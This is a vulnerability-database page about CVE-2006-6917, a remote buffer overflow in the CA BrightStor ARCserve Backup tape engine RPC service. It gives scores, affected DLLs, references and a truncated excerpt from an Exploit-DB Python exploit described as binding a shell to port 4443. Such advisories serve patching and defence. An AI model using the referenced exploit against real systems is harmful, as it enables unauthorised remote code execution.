Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact
10
CVSSv2

CVE-2006-6917

Published: 31/12/2006 Updated: 07/04/2021
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
Subscribe to Brightstor Arcserve Backup Server

Vulnerability Summary

Multiple buffer overflows in Computer Associates (CA) BrightStor ARCserve Backup R11.5 Server before SP2 allows remote malicious users to execute arbitrary code in the Tape Engine (tapeeng.exe) via a crafted RPC request with (1) opnum 38, which is not properly handled in TAPEUTIL.dll 11.5.3884.0, or (2) opnum 37, which is not properly handled in TAPEENG.dll 11.5.3884.0.

Vulnerable Product Search on Vulmon Subscribe to Product

broadcom brightstor arcserve backup server 11.5

Exploits

Exploit DB: CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow
#!/usr/bin/python # Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve # tapeengexe service Tested on windows 2000 SP4 Binds shell to TCP port 4443 # # Winny M Thomas ;-) # Author shall bear no responsibility for any screw ups caused by using this code from impacketdcerpc import transport, dcerpc from impacket import u ...

References

NVD-CWE-Otherhttp://www.securityfocus.com/archive/1/453930/30/390/threadedhttp://www.securityfocus.com/archive/1/454094/30/360/threadedhttp://www.lssec.com/advisories/LS-20061001.pdfhttp://www.lssec.com/advisories/LS-20060908.pdfhttp://supportconnectw.ca.com/public/storage/infodocs/basbrtapeeng-secnotice.asphttp://www3.ca.com/securityadvisor/newsinfo/collateral.aspx?cid=97428http://www3.ca.com/securityadvisor/vulninfo/vuln.aspx?id=34959http://www.securityfocus.com/archive/1/456711http://www.securityfocus.com/archive/1/454088/30/0/threadedhttp://www.securityfocus.com/archive/1/453933/30/420/threadedhttps://www.exploit-db.com/exploits/3086http://www.securityfocus.com/archive/1/456428/100/0/threadedhttps://nvd.nist.govhttps://www.exploit-db.com/exploits/3086/
CVSSv2
CVSSv2
CVSSv3
VMScore
Recommendations:
man-in-the-middleCVE-2024-34558CVE-2024-32674CVE-2024-34351XPath injectionCVE-2023-45866CVE-2024-25528CVE-2024-25517path traversal
Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook